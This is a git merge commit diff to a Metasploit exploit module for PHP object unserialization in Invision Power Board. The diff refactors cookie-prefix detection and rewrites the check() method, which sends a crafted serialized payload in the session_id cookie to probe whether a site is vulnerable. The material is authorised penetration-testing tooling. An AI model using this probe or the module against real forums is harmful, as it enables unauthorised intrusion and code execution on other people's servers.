Merge branch 'invision_pboard_cleanup' of git://github.com/jvazquez-r7/metasploit-framework into jvazquez-r7-invision_pboard_cleanup

2012-11-16 11:24:04 -06:00 · 2012-11-16 11:24:04 -06:00 · 8930d618e3
parent e8fe6031e9 09ec7dea95
commit 8930d618e3
1 changed files with 31 additions and 34 deletions
--- a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb
+++ b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb
@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			},
 			'Author'         =>
 				[
-					'EgiX',         # Vulnerability discovery and PoC
+					'EgiX',         # Vulnerability discovery, PoC, work on check() and cookie_prefix() methods
 					'juan vazquez', # Metasploit module
 					'sinn3r'        # PhpEXE tekniq & check() method
 				],
@ -69,28 +69,39 @@ class Metasploit3 < Msf::Exploit::Remote
 		return base
 	end

-	def check
-		res = send_request_raw({'uri'=>"#{base}index.php"})
-		return Exploit::CheckCode::Unknown if not res
+	def cookie_prefix
+		print_status("#{@peer} - Checking for cookie prefix")
+		cookie_prefix = ""
+		res = send_request_cgi(
+			{
+				'uri' => "#{base}index.php",
+				'method' => 'GET'
+			})

-		version = res.body.scan(/Community Forum Software by IP\.Board (\d+)\.(\d+).(\d+)/).flatten
-		return Exploit::CheckCode::Safe if version.empty?
-		version = version.map {|e| e.to_i}
-
-		# We only want major version 3
-		# This version checking is based on OSVDB's info
-		return Exploit::CheckCode::Safe if version[0] != 3
-
-		case version[1]
-		when 1
-			return Exploit::CheckCode::Vulnerable if version[2].between?(0, 4)
-		when 2
-			return Exploit::CheckCode::Vulnerable if version[2].between?(0, 3)
-		when 3
-			return Exploit::CheckCode::Vulnerable if version[2].between?(0, 4)
+		if res and res.code == 200 and res.headers['Set-Cookie'] =~ /(.+)session/
+			print_status("#{@peer} - Cookie prefix #{$1} found")
+			cookie_prefix = $1
 		end
+		return cookie_prefix
+	end

-		return Exploit::CheckCode::Safe
+	def check
+		@peer = "#{rhost}:#{rport}"
+		check_str = Rex::Text.uri_encode('a:1:{i:0;O:1:"x":0:{}}')
+		res = send_request_cgi(
+			{
+				'uri' => "#{base}index.php",
+				'method' => 'GET',
+				'cookie' => "#{cookie_prefix}session_id=#{check_str}"
+			})
+
+		if res and res.code == 500 or res.body =~ /PHP_Incomplete_Class/
+			return Exploit::CheckCode::Vulnerable
+		elsif res and res.code == 200
+			return Exploit::CheckCode::Safe
+		else
+			return Exploit::CheckCode::Unknown
+		end
 	end

 	def on_new_session(client)
@ -110,20 +121,6 @@ class Metasploit3 < Msf::Exploit::Remote
 		@upload_php = rand_text_alpha(rand(4) + 4) + ".php"
 		@peer = "#{rhost}:#{rport}"

-		print_status("#{@peer} - Checking for cookie prefix")
-		res = send_request_cgi(
-		{
-			'uri' => "#{base}index.php",
-			'method' => 'GET'
-		})
-
-		if res and res.code == 200 and res.headers['Set-Cookie'] =~ /(.+)session/
-			print_status("#{@peer} - Cookie prefix #{$1} found")
-			cookie_prefix = $1
-		else
-			cookie_prefix = ""
-		end
-
 		# get_write_exec_payload uses a function, which limits our ability to support
 		# Linux payloads, because that requires a space:
 		#   function my_cmd